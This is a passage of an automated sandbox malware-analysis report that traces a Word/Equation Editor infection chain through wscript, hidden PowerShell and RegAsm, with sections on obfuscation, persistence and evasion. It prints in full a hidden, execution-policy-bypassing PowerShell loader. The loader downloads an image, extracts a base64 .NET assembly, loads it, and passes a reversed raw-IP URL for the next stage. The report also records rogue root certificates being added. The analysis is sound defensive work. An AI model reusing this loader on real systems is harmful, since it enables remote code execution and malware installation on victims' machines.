                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE868 push eax; ret 2_2_005FE86B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE860 push eax; ret 2_2_005FE863
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE626 push eax; ret 2_2_005FE627
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE2D5 push edx; ret 2_2_005FE2D7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FDACE push eax; ret 2_2_005FDACF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE68D push eax; ret 2_2_005FE68F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE685 push eax; ret 2_2_005FE687
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FC75B push edx; ret 2_2_005FC7E7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE34E push eax; ret 2_2_005FE34F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE378 push ecx; ret 2_2_005FE4BB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FB96B push ebx; ret 2_2_005FB96F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FA966 push eax; ret 2_2_005FA967
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE30F push edx; ret 2_2_005FE31F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0060170E push eax; ret 2_2_0060170F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE326 push edx; ret 2_2_005FE327
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FA9CD push eax; ret 2_2_005FA9CF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FE7F2 push eax; ret 2_2_005FE85B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FC7EE push edx; ret 2_2_005FC7EF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_006015A2 push edx; ret 2_2_006015A3
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FCD90 push edx; ret 2_2_005FCD93
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005FCD8A push edx; ret 2_2_005FCD8B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_0060159A push edx; ret 2_2_0060159B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00252D62 pushfd ; ret 8_2_00252D71
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00252D4D pushad ; ret 8_2_00252D61
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00252DE9 push ebx; ret 8_2_00252DEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_0025234D pushad ; retf 8_2_00252361
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00252380 pushfd ; retf 8_2_00252389
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00457186 push ecx; ret 9_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0045E55D push esi; ret 9_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00457AA8 push eax; ret 9_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00434EB6 push ecx; ret 9_2_00434EC9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File dump: ~WRD0000.tmp.0.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00406EEB ShellExecuteW,URLDownloadToFileW,9_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F7E2 Sleep,ExitProcess,9_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A7D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 361
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 937
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5658
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9319
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1648
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3360Thread sleep time: -240000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 937 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 5658 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -3600000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3772Thread sleep count: 268 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3772Thread sleep time: -134000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep count: 133 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep time: -399000s >= -30000s
